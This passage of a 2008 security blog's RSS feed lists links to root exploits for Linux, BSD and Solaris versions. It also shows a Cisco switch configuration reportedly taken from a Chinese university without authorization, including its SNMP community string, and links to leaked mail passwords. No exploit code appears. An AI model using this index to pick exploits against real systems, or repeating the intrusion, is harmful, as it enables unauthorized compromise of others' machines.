src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=89&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2008/11/27/attack-port-1521-oracle/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>Root exploits and working links.</title>
		<link>http://kavasilo.wordpress.com/2008/11/27/root-exploits-and-working-links/</link>
		<comments>http://kavasilo.wordpress.com/2008/11/27/root-exploits-and-working-links/#comments</comments>
		<pubDate>Thu, 27 Nov 2008 09:46:25 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=87</guid>
		<description><![CDATA[Recently i found a list with some &#8220;root&#8221; remote and local exploits with the related link to the actual exploit code.   If you know that some exploits are missing contact me to add it. Linux Common Linux 2.2.x -&#62;Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3) Linux 2.2.x (on exported files, should be vuln) (http://milw0rm.com/exploits/718) Linux [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=87&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Recently i found a list with some &#8220;root&#8221; remote and local exploits with the related link to the actual exploit code.   If you know that some exploits are missing contact me to add it.</p>
<p><strong>Linux</strong><br />
<strong>Common</strong><br />
Linux 2.2.x -&gt;Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3)<br />
Linux 2.2.x (on exported files, should be vuln) (http://milw0rm.com/exploits/718)<br />
Linux &lt;= 2.2.25 -&gt;Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)</p>
<p>Linux 2.4.x -&gt;Linux kernel ptrace/kmod local root exploit (http://milw0rm.com/exploits/3)<br />
Linux 2.4.x -&gt; pwned.c &#8211; Linux 2.4 and 2.6 sys_uselib local root exploit (http://milw0rm.com/exploits/895)<br />
Linux 2.4.x -&gt;Linux kernel 2.4 uselib() privilege elevation exploit (http://milw0rm.com/exploits/778)<br />
Linux 2.4.20 -&gt;Linux Kernel Module Loader Local R00t Exploit (http://milw0rm.com/exploits/12)<br />
Linux &lt;= 2.4.22 -&gt;Linux Kernel &lt;= 2.4.22 (do_brk) Local Root Exploit (http://milw0rm.com/exploits/131)<br />
Linux 2.4.22 -&gt;Linux Kernel 2.4.22 &#8220;do_brk()&#8221; local Root Exploit (PoC) (http://milw0rm.com/exploits/129)</p>
<p>Linux &lt;= 2.4.24 -&gt;Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)<br />
Linux 2.4.x &lt; 2.4.27-rc3 (on nfs exported files) (http://milw0rm.com/exploits/718)</p>
<p>Linux &lt;= 2.6.2 -&gt;Linux Kernel 2.x mremap missing do_munmap Exploit (http://milw0rm.com/exploits/160)<br />
Linux 2.6.11 -&gt; Linux Kernel &lt;= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c) (http://milw0rm.com/exploits/1397)<br />
Linux 2.6.13 &lt;= 2.6.17.4 -&gt; Linux Kernel 2.6.13 &lt;= 2.6.17.4 prctl() Local Root Exploit (logrotate) (http://milw0rm.com/exploits/2031)<br />
Linux 2.6.13 &lt;= 2.6.17.4 -&gt; Linux Kernel 2.6.13 &lt;= 2.6.17.4 sys_prctl() Local Root Exploit (http://milw0rm.com/exploits/2011)<br />
Linux 2.6.11 &lt;= 2.6.17.4 -&gt; h00lyshit.c -Linux Kernel &lt;= 2.6.17.4 (proc) Local Root Exploit (http://milw0rm.com/exploits/2013)<br />
Linux 2.6.x &lt; 2.6.7-rc3 (default configuration) (http://milw0rm.com/exploits/718)<br />
Linux 2.6.x -&gt; pwned.c &#8211; Linux 2.4 and 2.6 sys_uselib local root exploit (http://milw0rm.com/exploits/895)</p>
<p><strong>Debian</strong><br />
Debian 2.2 -&gt;/usr/bin/pileup Local Root Exploit (http://milw0rm.com/exploits/1170)</p>
<p><strong>Ubuntu</strong><br />
Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability (http://milw0rm.com/exploits/1579)</p>
<p><strong>Slackware</strong><br />
Slackware 7.1 -&gt;/usr/bin/Mail Exploit (http://milw0rm.com/exploits/285)</p>
<p><strong>Mandrake</strong><br />
Mandrake 8.2 -&gt; /usr/mail local exploit (http://milw0rm.com/exploits/40)<br />
Mandrake &lt;= 10.2 -&gt; cdrdao Local Root Exploit (http://milw0rm.com/exploits/997)</p>
<p><strong>Suse</strong><br />
SuSE Linux 9.1 -&gt; &#8216;chfn&#8217; local root bug (http://milw0rm.com/exploits/1299)<br />
SuSE Linux 9.2 -&gt; &#8216;chfn&#8217; local root bug (http://milw0rm.com/exploits/1299)<br />
SuSE Linux 9.3 -&gt; &#8216;chfn&#8217; local root bug (http://milw0rm.com/exploits/1299)<br />
SuSE Linux 10.0 -&gt; &#8216;chfn&#8217; local root bug (http://milw0rm.com/exploits/1299)<br />
SuSE Linux Enterprise Server 8 -&gt; &#8216;chfn&#8217; local root bug (http://milw0rm.com/exploits/1299)<br />
SuSE Linux Enterprise Server 9 -&gt; &#8216;chfn&#8217; local root bug (http://milw0rm.com/exploits/1299)</p>
<p><strong>BSD</strong><br />
<strong>Freebsd</strong><br />
Freebsd 3.5.1 -&gt;Ports package local root (http://milw0rm.com/exploits/286)<br />
Freebsd 4.2 -&gt;Ports package local root (http://milw0rm.com/exploits/286)<br />
FreeBSD 4.x &lt;= 5.4) master.passwd Disclosure Exploit (http://milw0rm.com/exploits/1311)</p>
<p><strong>Openbsd</strong></p>
<p>Openbsd 2.x &#8211; 3.3 -&gt;exec_ibcs2_coff_prep_zmagic() Kernel Exploit (http://milw0rm.com/exploits/125)<br />
OpenBSD 3.x-4.0 -&gt;vga_ioctl() root exploit (http://milw0rm.com/exploits/3094)</p>
<p><strong>Sun-Microsystems Solaris</strong><br />
Solaris 2.4 -&gt;lion24.c (http://milw0rm.com/exploits/328)</p>
<p>Solaris 2.6 with 107733-10 and without 107733-11 (http://milw0rm.com/exploits/1182)<br />
Solaris 2.6 with 107733-10 and without 107733-11 (http://milw0rm.com/exploits/1182)<br />
Solaris 5.5.1 -&gt;X11R6.3 xterm (http://milw0rm.com/exploits/338)<br />
Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (http://milw0rm.com/exploits/1182)<br />
Solaris 7 with 106950-14 through 106950-22 and without 106950-23 (http://milw0rm.com/exploits/1182)<br />
Solaris 7 without patch 107178-03 (http://milw0rm.com/exploits/714)<br />
Solaris 7 without patch 107178-03 (http://milw0rm.com/exploits/713)<br />
Solaris 8 without patch 108949-08 (http://milw0rm.com/exploits/713)<br />
Solaris 8 without patch 108949-08 (http://milw0rm.com/exploits/714)<br />
Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (http://milw0rm.com/exploits/1182)<br />
Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (http://milw0rm.com/exploits/715)<br />
Solaris 8 with 109147-07 through 109147-24 and without 109147-25 (http://milw0rm.com/exploits/1182)<br />
Solaris 8 with 108993-14 through 108993-31 and without 108993-32 (http://milw0rm.com/exploits/715)<br />
Solaris 9 without patch 116308-01 (http://milw0rm.com/exploits/714)<br />
Solaris 9 without patch 116308-01 (http://milw0rm.com/exploits/713)</p>
<p>Solaris 9 without 113476-11 (http://milw0rm.com/exploits/715)<br />
Solaris 9 without 112963-09 (http://milw0rm.com/exploits/1182)<br />
Solaris 9 without 113476-11 (http://milw0rm.com/exploits/715)<br />
Solaris 9 without 112963-09 (http://milw0rm.com/exploits/1182)<br />
Solaris 10 (libnspr) Arbitrary File Creation Local Root Exploit (http://milw0rm.com/exploits/2543)<br />
Solaris 10 (libnspr) constructor Local Root Exploit (http://milw0rm.com/exploits/2641)</p>
<p><strong>SunOS</strong><br />
SunOS 5.10 Generic i86pc i386 i86pc (http://milw0rm.com/exploits/1073)<br />
SunOS 5.9 Generic_112233-12 sun4u (http://milw0rm.com/exploits/1073)</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/87/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/87/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/87/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=87&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2008/11/27/root-exploits-and-working-links/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>University in China</title>
		<link>http://kavasilo.wordpress.com/2008/11/25/university-in-china/</link>
		<comments>http://kavasilo.wordpress.com/2008/11/25/university-in-china/#comments</comments>
		<pubDate>Tue, 25 Nov 2008 23:58:10 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=79</guid>
		<description><![CDATA[Sometimes is bad configuration and some times is human stupidity. I can not decide myself so the choice is yours. Some friend obtain the following conf simple using some default cisco bugs. The administrators didnt update the device at all. User Access Verification Password: c3550-north-compus&#62; c3550-north-compus&#62; c3550-north-compus&#62;en Password: 3550-north-compus# c3550-north-compus# c3550-north-compus#show conf Using 4128 out [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=79&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Sometimes is bad configuration and some times is human stupidity. I can not decide myself so the choice is yours. Some friend obtain the following conf simple using some default cisco bugs. The administrators didnt update the device at all.</p>
<p>User Access Verification<br />
Password:<br />
c3550-north-compus&gt;<br />
c3550-north-compus&gt;<br />
c3550-north-compus&gt;en<br />
Password:<br />
3550-north-compus#<br />
c3550-north-compus#<br />
c3550-north-compus#show conf<br />
Using 4128 out of 393216 bytes<br />
!<br />
version 12.2<br />
no service pad<br />
service timestamps debug uptime<br />
service timestamps log uptime<br />
no service password-encryption<br />
!<br />
hostname c3550-north-compus<br />
enable secret 5  XXXXXXXXXXXXXXXXXXXXXXXX<br />
&#8230;&#8230;&#8230;&#8230;&#8230;..<br />
&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..<br />
&#8230;&#8230;&#8230;&#8230;&#8230;.<br />
ip subnet-zero<br />
ip routing<br />
ip dhcp relay information option<br />
ip dhcp excluded-address 172.17.252.1<br />
ip dhcp excluded-address 172.17.253.1<br />
ip dhcp excluded-address 172.17.254.1<br />
&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.<br />
!<br />
vlan internal allocation policy ascending<br />
!<br />
vlan 290<br />
name office<br />
!<br />
vlan 291<br />
name lib<br />
!<br />
vlan 292<br />
name teach<br />
!<br />
vlan 293<br />
name cernetip<br />
!<br />
vlan 294<br />
name manager<br />
!<br />
vlan 976<br />
&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..<br />
snmp-server community ahunic RO<br />
!<br />
control-plane<br />
!<br />
!<br />
line con 0<br />
line vty 0 4<br />
password xxxxxxxxxx<br />
login<br />
line vty 5 15<br />
login<br />
!<br />
!<br />
end</p>
<p>c3550-north-compus#</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/79/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/79/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/79/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=79&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2008/11/25/university-in-china/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>&#8230;Hack of the year 2007!!!!</title>
		<link>http://kavasilo.wordpress.com/2008/11/25/hack-of-the-year-2007/</link>
		<comments>http://kavasilo.wordpress.com/2008/11/25/hack-of-the-year-2007/#comments</comments>
		<pubDate>Tue, 25 Nov 2008 14:33:55 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=73</guid>
		<description><![CDATA[This was the hack of the year 2007. A pretty good and interesting story. The-Hack-Of-The-Year Proof of concept : Hacked+Mail+Passwords<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=73&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This was the hack of the year 2007. A pretty good and interesting story. </p>
<p><a href="http://www.smh.com.au/news/security/the-hack-of-the-year/2007/11/12/1194766589522.html">The-Hack-Of-The-Year</a></p>
<p>Proof of concept :</p>
<p><a href="http://bp0.blogger.com/_Z8mwJp4iSOo/Rtkvz8xWdzI/AAAAAAAACcM/8DgUxwkA0LI/s1600-h/Hacked+Mail+Passwords.JPG">Hacked+Mail+Passwords</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/73/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/73/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/73/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/73/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/73/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/73/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/73/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/73/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/73/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/73/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/73/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/73/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/73/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/73/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=73&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2008/11/25/hack-of-the-year-2007/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
		<item>
		<title>Linux Configuration Files (PART III)</title>
		<link>http://kavasilo.wordpress.com/2008/11/21/linux-configuration-files-part-iii/</link>
		<comments>http://kavasilo.wordpress.com/2008/11/21/linux-configuration-files-part-iii/#comments</comments>
		<pubDate>Fri, 21 Nov 2008 08:32:43 +0000</pubDate>
		<dc:creator>kavasilo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://kavasilo.wordpress.com/?p=71</guid>
		<description><![CDATA[/etc/networks  Lists names and addresses of networks, used by the route command /etc/nologin     If this file exists, non root logins are disabled /etc/nsswitch.conf  Name service  switch configuration file /etc/passwd     Includes username,real name, Home directory, encrypted passwdord /etc/printcap    A configuration file for printers /etc/profile      Files executed at login or startup time by the Bourne or C [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=71&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<ul>
<li>/etc/networks  Lists names and addresses of networks, used by the route command</li>
<li>/etc/nologin     If this file exists, non root logins are disabled</li>
<li>/etc/nsswitch.conf  Name service  switch configuration file</li>
<li>/etc/passwd     Includes username,real name, Home directory, encrypted passwdord</li>
<li>/etc/printcap    A configuration file for printers</li>
<li>/etc/profile      Files executed at login or startup time by the Bourne or C shells</li>
<li>/etc/rc or /etc/rc.d or /etc/rc?.d Init runs this when it starts</li>
<li>/etc/resolv.conf Configures the name resolver, specifying the address of your name server and your domain name</li>
<li>/etc/securetty  Identifies secure terminals from which root is allowed to login</li>
<li>/etc/shadow    Encypted passwords</li>
<li>/etc/shadow.group Systems with shadow passwords may have this file</li>
<li>/etc/shells       List  trusted shells</li>
<li>/etc/sudoers    A list of users with specials privileges</li>
</ul>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/kavasilo.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/kavasilo.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/kavasilo.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/kavasilo.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/kavasilo.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/kavasilo.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/kavasilo.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/kavasilo.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/kavasilo.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/kavasilo.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/kavasilo.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/kavasilo.wordpress.com/71/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/kavasilo.wordpress.com/71/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/kavasilo.wordpress.com/71/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=kavasilo.wordpress.com&amp;blog=4594427&amp;post=71&amp;subd=kavasilo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://kavasilo.wordpress.com/2008/11/21/linux-configuration-files-part-iii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/c667b813ce7a0a182430234752a0f9ea?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">kavasilo</media:title>
		</media:content>
	</item>
	</channel>
</rss>
